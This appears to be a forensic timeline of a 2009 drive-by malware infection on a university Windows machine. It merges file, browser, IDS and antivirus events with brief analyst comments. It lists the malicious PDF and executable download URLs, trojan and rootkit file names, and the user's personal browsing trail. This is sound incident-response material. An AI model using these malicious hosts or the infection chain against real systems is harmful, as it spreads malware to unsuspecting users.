02/19/09 7:55:59 modified RUNDLL32.EXE-4DEB4935.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-4DEB4935.pf
02/19/09 7:56:06 accessed index.dat :Host: ubw.osu.edu History\Daily -
02/19/09 7:56:19 created smith.99999@sloppykisscards[1].txt sloppykisscards.com/ Cookies -
02/19/09 7:56:21 accessed index.dat :Host: www.sloppykisscards.com History\Daily -
02/19/09 7:56:21 accessed index.dat http://www.sloppykisscards.com/partnerfetch.php?partnerid=vetinsite&partnerAffiliateId=36&cardId=npg28wkc3b History\Daily -
02/19/09 7:57:07 logged SysEvent.Evt EVENT ID: 1 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The System Restore filter encountered the unexpected error '0xC000000D' while processing the file 'Bootcode.ini' on the volume 'Disk0'. It has stopped monitoring the volume. -
02/19/09 8:00:07 accessed WINWORD.EXE-33AEA629.pf C:\WINDOWS\Prefetch\WINWORD.EXE-33AEA629.pf
02/19/09 8:00:07 written WINWORD.EXE-33AEA629.pf C:\WINDOWS\Prefetch\WINWORD.EXE-33AEA629.pf
02/19/09 8:00:07 modified WINWORD.EXE-33AEA629.pf C:\WINDOWS\Prefetch\WINWORD.EXE-33AEA629.pf
02/19/09 8:02:17 accessed RUNDLL32.EXE-4FF9832D.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-4FF9832D.pf
02/19/09 8:02:17 written RUNDLL32.EXE-4FF9832D.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-4FF9832D.pf
02/19/09 8:02:17 modified RUNDLL32.EXE-4FF9832D.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-4FF9832D.pf
02/19/09 8:02:33 accessed PSCT8500.EXE-0492DFC4.pf C:\WINDOWS\Prefetch\PSCT8500.EXE-0492DFC4.pf
02/19/09 8:02:33 written PSCT8500.EXE-0492DFC4.pf C:\WINDOWS\Prefetch\PSCT8500.EXE-0492DFC4.pf
02/19/09 8:02:33 modified PSCT8500.EXE-0492DFC4.pf C:\WINDOWS\Prefetch\PSCT8500.EXE-0492DFC4.pf
02/19/09 8:15:31 accessed RUNDLL32.EXE-6BA7CEE7.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-6BA7CEE7.pf
02/19/09 8:15:31 created RUNDLL32.EXE-6BA7CEE7.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-6BA7CEE7.pf
02/19/09 8:15:31 written RUNDLL32.EXE-6BA7CEE7.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-6BA7CEE7.pf
02/19/09 8:15:31 modified RUNDLL32.EXE-6BA7CEE7.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-6BA7CEE7.pf
02/19/09 8:15:51 accessed index.dat :Host: www.cuofohio.org History\Daily -
02/19/09 8:17:26 accessed Credit Union of Ohio - Your Financial Resource Partner.url http://www.cuofohio.org/ Bookmarks -
02/19/09 8:17:26 accessed index.dat http://www.cuofohio.org History\Daily -
02/19/09 8:17:44 accessed index.dat :Host: buckeyelink.osu.edu History\Daily -
02/19/09 8:17:44 accessed index.dat http://buckeyelink.osu.edu History\Daily -
02/19/09 8:17:53 accessed index.dat :Host: carmen.osu.edu History\Daily -
02/19/09 8:17:53 accessed index.dat https://carmen.osu.edu History\Daily -
02/19/09 8:20:37 accessed index.dat https://carmen.osu.edu/goodbye.asp History\Daily -
02/19/09 8:24:13 accessed RUNDLL32.EXE-71655565.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-71655565.pf
02/19/09 8:24:13 created RUNDLL32.EXE-71655565.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-71655565.pf
02/19/09 8:24:13 written RUNDLL32.EXE-71655565.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-71655565.pf
02/19/09 8:24:13 modified RUNDLL32.EXE-71655565.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-71655565.pf
02/19/09 8:24:25 accessed index.dat :Host: www.co.franklin.oh.us History\Daily -
02/19/09 8:24:25 accessed index.dat http://www.co.franklin.oh.us/auditor History\Daily -
02/19/09 8:24:26 accessed Joseph W. Testa, Franklin County Auditor - Welcome!.url http://www.co.franklin.oh.us/auditor/ Bookmarks -
02/19/09 8:24:32 accessed index.dat :Host: franklincountyoh.metacama.com History\Daily -
02/19/09 8:25:06 accessed index.dat http://franklincountyoh.metacama.com/do/selectDisplay?select=PHOTO&curpid=01000596400 History\Daily -
02/19/09 8:25:15 created [email protected][1].txt ad.yieldmanager.com/ Cookies -
02/19/09 8:25:20 accessed index.dat http://franklincountyoh.metacama.com/do/selectDisplay?select=GIS&curpid=01000596400 History\Daily -
02/19/09 8:25:27 accessed index.dat :Host: fcgis3.metacama.com History\Daily -
02/19/09 8:25:27 accessed index.dat http://fcgis3.metacama.com/scripts/gis_show_parcel_info.pl?zoom=5&zmlvl=3&stype=valid&mapx=264&mapy=194&pname=283813&pid=010-005964&pick=&intersect= History\Daily -
02/19/09 8:25:33 accessed index.dat http://fcgis3.metacama.com/scripts/gis_show_parcel_info.pl?zoom=5&zmlvl=5&stype=valid&mapx=264&mapy=194&pname=4922790&pid=010-005964&pick=&intersect= History\Daily -
02/19/09 8:25:46 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/19895@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=24.80&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=168&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=24.80&WO3=0&WO4=68.00&Z3=43204& History\Daily -
02/19/09 8:27:50 accessed index.dat http://franklincountyoh.metacama.com/altIndex.jsp History\Daily -
02/19/09 8:28:09 accessed index.dat http://franklincountyoh.metacama.com/do/selectDisplay?select=PHOTO&curpid=02000088800 History\Daily -
02/19/09 8:28:16 accessed index.dat http://franklincountyoh.metacama.com/do/searchByAddress History\Daily -
02/19/09 8:30:24 accessed RUNDLL32.EXE-71E22CD3.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-71E22CD3.pf
02/19/09 8:30:24 created RUNDLL32.EXE-71E22CD3.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-71E22CD3.pf
02/19/09 8:30:24 written RUNDLL32.EXE-71E22CD3.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-71E22CD3.pf
02/19/09 8:30:24 modified RUNDLL32.EXE-71E22CD3.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-71E22CD3.pf
02/19/09 8:52:57 accessed index.dat :Host: webcal.vip.ohio-state.edu History\Daily -
02/19/09 8:53:01 created [email protected][2].txt webcal.vip.ohio-state.edu/fcgi-bin/swc/ Cookies -
02/19/09 8:53:02 accessed index.dat http://webcal.vip.ohio-state.edu/fcgi-bin/swc/lexacal.fcgi History\Daily -
02/19/09 8:53:04 accessed index.dat http://webcal.vip.ohio-state.edu/fcgi-bin/swc/lexacal.fcgi?go=calendar&date=2009/2/19&utc=49984 History\Daily -
02/19/09 9:22:31 created smith.99999@247realmedia[1].txt 247realmedia.com/ Cookies -
02/19/09 9:25:09 modified Out.mbx C:\Program Files\Qualcomm\Eudora\Out.mbx
02/19/09 9:25:09 written Out.mbx C:\Program Files\Qualcomm\Eudora\Out.mbx
02/19/09 9:25:29 accessed Out.mbx C:\Program Files\Qualcomm\Eudora\Out.mbx
02/19/09 9:25:43 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/1869@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=20.30&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=169&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=20.30&WO3=0&WO4=83.00&Z3=43204& History\Daily -
02/19/09 9:25:44 accessed index.dat :Host: w3.brhs.org History\Daily -
02/19/09 9:25:44 accessed index.dat http://w3.brhs.org History\Daily -
02/19/09 9:25:45 accessed BRHS.ORG.url http://w3.brhs.org/ Bookmarks -
02/19/09 9:25:49 accessed index.dat :Host: www.brhs.org History\Daily -
02/19/09 9:25:49 accessed index.dat http://www.brhs.org/announcements/updatednews.htm History\Daily -
02/19/09 9:26:14 the fun (probably) starts here...
02/19/09 9:26:15 created smith.99999@jjhuddle[2].txt jjhuddle.com/ Cookies -
02/19/09 9:26:19 accessed index.dat :Host: www.jjhuddle.com History\Daily -
02/19/09 9:26:19 accessed index.dat http://www.jjhuddle.com History\Daily -
02/19/09 9:26:22 created smith.99999@infolinks[2].txt infolinks.com/ Cookies -
02/19/09 9:26:50 accessed index.dat http://www.jjhuddle.com/forums/forumdisplay.php?f=306 History\Daily -
02/19/09 9:27:19 accessed index.dat http://www.jjhuddle.com/forums/showthread.php?t=186381 History\Daily -
02/19/09 9:27:38 accessed index.dat http://www.jjhuddle.com/forums/showthread.php?t=186381&page=3 History\Daily -
02/19/09 9:27:43 created smith.99999@adbrite[1].txt adbrite.com/ Cookies -
02/19/09 9:27:47 created smith.99999@crwdcntrl[2].txt crwdcntrl.net/ Cookies -
02/19/09 9:27:53 created smith.99999@adbrite[1].txt adbrite.com/ Cookies -
02/19/09 9:27:56 created [email protected][1].txt www.soarnxec.net/ Cookies -
02/19/09 9:28:13 banner[1], [2].pdf are created...these both contain malware (currently not identified by virustotal)
02/19/09 9:28:14 created banner[1].pdf C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\Z1NOBJL1\banner[1].pdf
02/19/09 9:28:14 created banner[2].pdf C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\Z1NOBJL1\banner[2].pdf
02/19/09 9:28:17 bro PDF document, version 1.4 GET http://srv.f-o-r.ms/code/document/banner?type=2&pid=154982
02/19/09 9:28:17 bro PDF document, version 1.4 GET http://srv.f-o-r.ms/code/document/banner?type=1&pid=154982
02/19/09 9:28:17 accessed index.dat :Host: srv.f-o-r.ms History\Daily -
02/19/09 9:28:17 accessed index.dat http://srv.f-o-r.ms/code/document/banner?type=1&pid=154982 History\Daily -
02/19/09 9:28:17 accessed index.dat http://srv.f-o-r.ms/code/document/banner?type=2&pid=154982 History\Daily -
02/19/09 9:28:17 written banner[1].pdf C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\Z1NOBJL1\banner[1].pdf
02/19/09 9:28:17 modified banner[1].pdf C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\Z1NOBJL1\banner[1].pdf
02/19/09 9:28:17 accessed banner[2].pdf C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\Z1NOBJL1\banner[2].pdf
02/19/09 9:28:17 written banner[2].pdf C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\Z1NOBJL1\banner[2].pdf
02/19/09 9:28:17 modified banner[2].pdf C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\Z1NOBJL1\banner[2].pdf
02/19/09 9:28:20 bro PDF document, version 1.4 GET http://srv.f-o-r.ms/code/document/banner?type=1&pid=154982
02/19/09 9:28:42 bro MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit GET http://f-o-r.ms/xrun.tmp
02/19/09 9:28:57 got xrun.tmp, apparently runs something called rn.tmp
02/19/09 9:28:57 accessed RN.TMP-36CAACC4.pf C:\WINDOWS\Prefetch\RN.TMP-36CAACC4.pf
02/19/09 9:28:57 created RN.TMP-36CAACC4.pf C:\WINDOWS\Prefetch\RN.TMP-36CAACC4.pf
02/19/09 9:28:57 written RN.TMP-36CAACC4.pf C:\WINDOWS\Prefetch\RN.TMP-36CAACC4.pf
02/19/09 9:28:57 modified RN.TMP-36CAACC4.pf C:\WINDOWS\Prefetch\RN.TMP-36CAACC4.pf
02/19/09 9:28:57 accessed RN.TMP-36CAACC4.pf C:\WINDOWS\Prefetch\RN.TMP-36CAACC4.pf
02/19/09 9:28:57 created RN.TMP-36CAACC4.pf C:\WINDOWS\Prefetch\RN.TMP-36CAACC4.pf
02/19/09 9:28:57 written RN.TMP-36CAACC4.pf C:\WINDOWS\Prefetch\RN.TMP-36CAACC4.pf
02/19/09 9:28:57 modified RN.TMP-36CAACC4.pf C:\WINDOWS\Prefetch\RN.TMP-36CAACC4.pf
02/19/09 9:29:15 accessed banner[1].pdf C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\Z1NOBJL1\banner[1].pdf
02/19/09 9:29:24 bro MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit GET http://srv.f-o-r.ms/xrun.tmp
02/19/09 9:29:29 bro application/x-dosexec GET http://srv.f-o-r.ms/xpre.tmp
02/19/09 9:29:29 bro no=HTTP_IncorrectFileType na=NOTICE_ALARM_ALWAYS es=node22 sa=164.107.xxx.177 sp=1656/tcp da=85.17.162.100 dp=80/tcp method=GET url=http://srv.f-o-r.ms/xpre.tmp msg=application/x-dosexec\ GET\ http://srv.f-o-r.ms/xpre.tmp tag=@83-10576-5c7e66
02/19/09 9:29:40 created smith.99999@247realmedia[1].txt 247realmedia.com/ Cookies -
02/19/09 9:29:40 created smith.99999@adbrite[1].txt adbrite.com/ Cookies -
02/19/09 9:29:40 created smith.99999@adgardener[1].txt adgardener.com/ Cookies -
02/19/09 9:29:40 created [email protected][1].txt ads.imarketservices.com/ Cookies -
02/19/09 9:29:40 created smith.99999@bluekai[2].txt bluekai.com/ Cookies -
02/19/09 9:29:40 created smith.99999@burstnet[2].txt burstnet.com/ Cookies -
02/19/09 9:29:40 created smith.99999@enhance[1].txt enhance.com/ Cookies -
02/19/09 9:29:40 created [email protected][1].txt fc.webmasterpro.de/ Cookies -
02/19/09 9:29:40 created [email protected][2].txt harvest99.adgardener.com/ Cookies -
02/19/09 9:29:40 created smith.99999@jjhuddle[2].txt jjhuddle.com/ Cookies -
02/19/09 9:29:40 created smith.99999@snap[1].txt snap.com/ Cookies -
02/19/09 9:29:40 created smith.99999@traderpub[1].txt traderpub.net/ Cookies -
02/19/09 9:29:40 created [email protected][2].txt www.burstbeacon.com/ Cookies -
02/19/09 9:29:40 created [email protected][1].txt www.burstnet.com/ Cookies -
02/19/09 9:29:40 created smith.99999@zedo[2].txt zedo.com/ Cookies -
02/19/09 9:32:57 accessed index.dat :Host: www.myadco.net History\Daily -
02/19/09 9:32:57 accessed index.dat http://www.jjhuddle.com/forums/showthread.php?t=186381&page=4 History\Daily -
02/19/09 9:32:57 accessed index.dat http://www.myadco.net/sa3.php?sid=2&id=00746499d6d2aef8af&keyword=bad+credit+car+financing History\Daily -
02/19/09 9:32:59 accessed index.dat :Host: search.zunga.com History\Daily -
02/19/09 9:32:59 accessed index.dat http://search.zunga.com/?search=bad+credit+car+financing History\Daily -
02/19/09 9:33:00 accessed index.dat :Host: 66.70.121.200 History\Daily -
02/19/09 9:33:00 accessed index.dat http://66.70.121.200/j?sid=0wzaQ7VTHFcwJF6z History\Daily -
02/19/09 9:33:02 accessed index.dat :Host: www.automart.com History\Daily -
02/19/09 9:33:02 accessed index.dat http://www.automart.com/creditsearchform.php/?CMP=KNC-AskCredit&WT.srch=1&WT.mc_id=AskCredit History\Daily -
02/19/09 9:33:20 created smith.99999@zedo[2].txt zedo.com/ Cookies -
02/19/09 9:33:22 created smith.99999@rubiconproject[1].txt rubiconproject.com/ Cookies -
02/19/09 9:33:22 created smith.99999@untd[2].txt untd.com/ Cookies -
02/19/09 9:33:24 created smith.99999@revsci[2].txt revsci.net/ Cookies -
02/19/09 9:33:25 created smith.99999@revsci[2].txt revsci.net/ Cookies -
02/19/09 9:33:25 created smith.99999@specificclick[2].txt specificclick.net/ Cookies -
02/19/09 9:33:26 created smith.99999@specificclick[2].txt specificclick.net/ Cookies -
02/19/09 9:33:30 created [email protected][1].txt sdc.traderpub.net/ Cookies -
02/19/09 9:33:31 created [email protected][2].txt at.atwola.com/ Cookies -
02/19/09 9:33:33 created [email protected][2].txt ehg-traderelectronicmedia.hitbox.com/ Cookies -
02/19/09 9:33:33 created smith.99999@hitbox[2].txt hitbox.com/ Cookies -
02/19/09 9:35:12 created smith.99999@cherylandco[2].txt cherylandco.com/ Cookies -
02/19/09 9:36:50 created [email protected][1].txt fc.webmasterpro.de/ Cookies -
02/19/09 9:37:46 accessed index.dat :Host: www.hswrestling.com History\Daily -
02/19/09 9:37:46 accessed index.dat http://www.hswrestling.com History\Daily -
02/19/09 9:37:55 something apparently created prun.tmp, rasesnet.tmp and winvsnet.tmp, these were deleted (though prun.tmp
02/19/09 9:37:56 Deleted prun.tmp C:\DOCUME~1\smith.99999\LOCALS~1\Temp\prun.tmp Generic.dx (Trojan) C:\DOCUME~1\smith.99999\LOCALS~1\Temp\xpre.tmp
02/19/09 9:38:01 Deleted rasesnet.tmp C:\DOCUME~1\smith.99999\LOCALS~1\Temp\rasesnet.tmp Vundo (Trojan) C:\DOCUME~1\smith.99999\LOCALS~1\Temp\xpre.tmp
02/19/09 9:38:01 Deleted winvsnet.tmp C:\DOCUME~1\smith.99999\LOCALS~1\Temp\winvsnet.tmp Generic Downloader.x (Trojan) C:\DOCUME~1\smith.99999\LOCALS~1\Temp\xpre.tmp
02/19/09 9:38:22 accessed Baum's Page Wrestling.url http://www.baumspage.com/ Bookmarks -
02/19/09 9:38:22 accessed index.dat :Host: www.baumspage.com History\Daily -
02/19/09 9:38:22 accessed index.dat http://www.baumspage.com History\Daily -
02/19/09 9:38:25 accessed index.dat http://www.baumspage.com/wr/index.htm History\Daily -
02/19/09 9:38:35 accessed index.dat http://www.baumspage.com/cesect/2009/index.htm History\Daily -
02/19/09 9:38:43 accessed index.dat http://www.baumspage.com/cesect/no3/brackets09.htm History\Daily -
02/19/09 9:38:55 accessed index.dat http://www.baumspage.com/cesect/no3/entrygrd.htm History\Daily -
02/19/09 9:39:06 accessed index.dat http://www.baumspage.com/new_system/default.asp History\Daily -
02/19/09 9:39:10 accessed index.dat http://www.baumspage.com/cesect/no3/index.htm History\Daily -
02/19/09 9:43:59 created smith.99999@135484[2].txt 135484.com/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt 4509.01.blueseek.com/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt 64.111.196.117/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt 6478.21.primosearch.com/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt 66.221.37.124/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt 66.230.188.67/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt 74.53.99.54/ Cookies -
02/19/09 9:43:59 created [email protected][2].txt 74.53.99.55/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt ad.yieldmanager.com/ Cookies -
02/19/09 9:43:59 created smith.99999@adtrafficsolution[1].txt adtrafficsolution.com/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt atd.agencytradingdesk.net/ Cookies -
02/19/09 9:43:59 created smith.99999@bizcash[1].txt bizcash.info/go/ Cookies -
02/19/09 9:43:59 created smith.99999@contextweb[2].txt contextweb.com/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt fc.webmasterpro.de/ Cookies -
02/19/09 9:43:59 created smith.99999@klickup[1].txt klickup.com/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt klite.ath.cx/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt load.exelator.com/load/ Cookies -
02/19/09 9:43:59 created [email protected][2].txt media.mtvnservices.com/ Cookies -
02/19/09 9:43:59 created smith.99999@mygeek[2].txt mygeek.com/ Cookies -
02/19/09 9:43:59 created smith.99999@myroitracking[2].txt myroitracking.com/ Cookies -
02/19/09 9:43:59 created smith.99999@primetrafficsite[1].txt primetrafficsite.com/go/ Cookies -
02/19/09 9:43:59 created smith.99999@redirectfor-me[2].txt Cookies -
02/19/09 9:43:59 created smith.99999@sportgfx[2].txt sportgfx.com/ Cookies -
02/19/09 9:43:59 created smith.99999@statcounter[2].txt statcounter.com/ Cookies -
02/19/09 9:43:59 created [email protected][2].txt tag.contextweb.com/ Cookies -
02/19/09 9:43:59 created smith.99999@thedailyshow[1].txt thedailyshow.com/ Cookies -
02/19/09 9:43:59 created [email protected][2].txt watches.revone.biz/ Cookies -
02/19/09 9:43:59 created smith.99999@wmvmedialease[1].txt wmvmedialease.com/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt www.abcjmp.com/ Cookies -
02/19/09 9:43:59 created [email protected][2].txt www.advertising365.com/ats/ Cookies -
02/19/09 9:43:59 created [email protected][2].txt www.advertyz.com/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt www.fxopen.com/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt www.investorsconsumergoods.com/ Cookies -
02/19/09 9:43:59 created [email protected][2].txt www.investorsconsumerservices.com/ Cookies -
02/19/09 9:43:59 created [email protected][2].txt www.investorsenergystocks.com/ Cookies -
02/19/09 9:43:59 created [email protected][2].txt www.investorsfinancials.com/ Cookies -
02/19/09 9:43:59 created [email protected][2].txt www.investorshealthcare.com/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt www.ncmfinancial.com/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt www.popunderserver.net/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt www.primetrafficsite.com/go/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt xyz.freelogs.com/ Cookies -
02/19/09 9:43:59 created [email protected][1].txt yellowpages.addresses.com/ Cookies -
02/19/09 9:43:59 created [email protected][2].txt yellowpagescom.addresses.com/ Cookies -
02/19/09 9:44:07 more bad stuff is created, run...mcafee finds what would appear to be a by-product...
02/19/09 9:44:08 created prunnet.exe C:\\WINDOWS\SYSTEM32\prunnet.exe Windows Executable Code\Executable Match File, Archive
02/19/09 9:44:08 written prunnet.exe C:\\WINDOWS\SYSTEM32\prunnet.exe Windows Executable Code\Executable Match File, Archive
02/19/09 9:44:24 created PRUNNET.EXE-18A96408.pf C:\WINDOWS\Prefetch\PRUNNET.EXE-18A96408.pf
02/19/09 9:44:24 created PRUNNET.EXE-18A96408.pf C:\WINDOWS\Prefetch\PRUNNET.EXE-18A96408.pf
02/19/09 9:44:33 Cleaned ecomsnraxw.tmp C:\DOCUME~1\smith.99999\LOCALS~1\Temp\ecomsnraxw.tmp W32/Virut.n.gen (Virus) C:\WINDOWS\system32\mshta.exe
02/19/09 9:44:37 bro application/x-dosexec GET http://childhe.com/pas/apstpldr.dll.html?affid=177047&uid=&guid=D294B3372EFC4D4CA6C6DDD12F79C20A
02/19/09 9:44:38 bro
02/19/09 9:44:48 the seneka rootkit...
02/19/09 9:44:49 created senekalhtijurw.sys C:\\WINDOWS\SYSTEM32\DRIVERS\senekalhtijurw.sys Device Driver Code\Executable Match File, Archive
02/19/09 9:44:49 written senekalhtijurw.sys C:\\WINDOWS\SYSTEM32\DRIVERS\senekalhtijurw.sys Device Driver Code\Executable Match File, Archive
02/19/09 9:44:57 Deleted wcenoxarms.tmp C:\DOCUME~1\smith.99999\LOCALS~1\Temp\wcenoxarms.tmp Generic Downloader.x (Trojan) C:\WINDOWS\system32\mshta.exe
02/19/09 9:45:00 created senekafqqjlktq.dll C:\\WINDOWS\SYSTEM32\senekafqqjlktq.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 9:45:00 modified senekalhtijurw.sys C:\\WINDOWS\SYSTEM32\DRIVERS\senekalhtijurw.sys Device Driver Code\Executable Match File, Archive
02/19/09 9:45:01 ????
02/19/09 9:45:02 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Windows Installer service was successfully sent a start control. -
02/19/09 9:45:02 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Windows Installer service entered the running state. -
02/19/09 9:45:02 logged SysEvent.Evt EVENT ID: 7034 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Windows Installer service terminated unexpectedly. It has done this 1 time(s). -
02/19/09 9:45:03 created senekalwbrsnty.dat C:\\WINDOWS\SYSTEM32\senekalwbrsnty.dat Data ASCII & Binary Code\Library ! Bad signature File, Archive
02/19/09 9:45:05 accessed senekakxidursb.dll C:\\WINDOWS\SYSTEM32\senekakxidursb.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 9:45:05 created senekakxidursb.dll C:\\WINDOWS\SYSTEM32\senekakxidursb.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 9:45:05 created senekarxltpsnr.dll C:\\WINDOWS\SYSTEM32\senekarxltpsnr.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 9:45:05 modified senekakxidursb.dll C:\\WINDOWS\SYSTEM32\senekakxidursb.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 9:45:05 modified senekarxltpsnr.dll C:\\WINDOWS\SYSTEM32\senekarxltpsnr.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 9:45:05 written senekakxidursb.dll C:\\WINDOWS\SYSTEM32\senekakxidursb.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 9:45:05 written senekarxltpsnr.dll C:\\WINDOWS\SYSTEM32\senekarxltpsnr.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 9:45:10 created winsinstall.exe C:\\Documents and Settings\smith.99999\Local Settings\Temp\winsinstall.exe Windows Executable Code\Executable Match File, Archive
02/19/09 9:45:12 accessed winsinstall.exe C:\\Documents and Settings\smith.99999\Local Settings\Temp\winsinstall.exe Windows Executable Code\Executable Match File, Archive
02/19/09 9:45:12 written winsinstall.exe C:\\Documents and Settings\smith.99999\Local Settings\Temp\winsinstall.exe Windows Executable Code\Executable Match File, Archive
02/19/09 9:45:13 bro application/x-dosexec GET http://rs263tg.rapidshare.com/files/198761582/winsinstall.exe
02/19/09 9:45:15 accessed SSSInstaller.dll C:\\Documents and Settings\smith.99999\Local Settings\Temp\SSSInstaller.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 9:45:28 modified winsinstall.exe C:\\Documents and Settings\smith.99999\Local Settings\Temp\winsinstall.exe Windows Executable Code\Executable Match File, Archive
02/19/09 9:46:01 Will be deleted after the next reboot (Clean failed) apstpldr.dll[1].htm C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\QXLU2P44\apstpldr.dll[1].htm Vundo (Trojan) C:\WINDOWS\Explorer.EXE
02/19/09 9:46:10 accessed index.dat :Host: klite.ath.cx History\Daily -
02/19/09 9:46:11 accessed index.dat :Host: saledirectwarehouse.com History\Daily -
02/19/09 9:46:11 accessed index.dat http://saledirectwarehouse.com/traffic.php History\Daily -
02/19/09 9:46:27 accessed index.dat :Host: www.globoengine.com History\Daily -
02/19/09 9:46:27 accessed index.dat http://www.globoengine.com/search_results.php?keyword=lung cancer&ref=48453 History\Daily -
02/19/09 9:46:30 accessed index.dat :Host: www.abcjmp.com History\Daily -
02/19/09 9:46:30 accessed index.dat http://www.abcjmp.com/jump2/?affiliate=netzter2&subid=01&terms=mortgage loan refinance History\Daily -
02/19/09 9:46:34 accessed index.dat http://www.abcjmp.com/jump2/?affiliate=calgonite&subid=01&terms=build credit cards History\Daily -
02/19/09 9:46:38 accessed index.dat :Host: www.searchfeed.com History\Daily -
02/19/09 9:46:38 accessed index.dat http://www.searchfeed.com/rd/Clk.jsp?s=ap&hu=1&k=lung+cancer&lnk2=rhhE?..4L68'G9'ExsBDyekxpr'pDB.ziBE9.>kffsAskhe=ML88)yiosq=8GG1M)hexBy=AiCg#G2pkCpex)ysq=Z2682LH1M8#L2buV2bdNubuNfJdNt8ANt8cO28TOLpdN9KRNumRF)k=fyx5f|2'282&p=82295&sid=256415&ex=1235054799525&snid=65 History\Daily -
02/19/09 9:46:40 accessed index.dat :Host: www.thedailyshow.com History\Daily -
02/19/09 9:46:40 accessed index.dat http://www.thedailyshow.com/video/index.jhtml?videoId=210190&title=Bill-O'Reilly-Pt.-1&tag=HTLF_generic&itemId=218531 History\Daily -
02/19/09 9:46:41 accessed index.dat :Host: 6478.21.primosearch.com History\Daily -
02/19/09 9:46:41 accessed index.dat http://6478.21.primosearch.com/jump1/?affiliate=5488&subid=82295&terms=lung cancer&sid=Z078043958@EzX0EDNzEzNfRDNy8lNy8FO08VO4cDN1ATNzITM&a=fsrqf History\Daily -
02/19/09 9:46:42 accessed index.dat http://6478.21.primosearch.com/jump2/?affiliate=5488&subid=82295&terms=lung cancer History\Daily -
02/19/09 9:46:44 accessed index.dat :Host: www.primosearch.com History\Daily -
02/19/09 9:46:44 accessed index.dat http://www.primosearch.com/cgi-bin/search.cgi?affiliate=index0001&subid=82295&terms=lung cancer History\Daily -
02/19/09 9:47:12 accessed index.dat :Host: www.fxopen.com History\Daily -
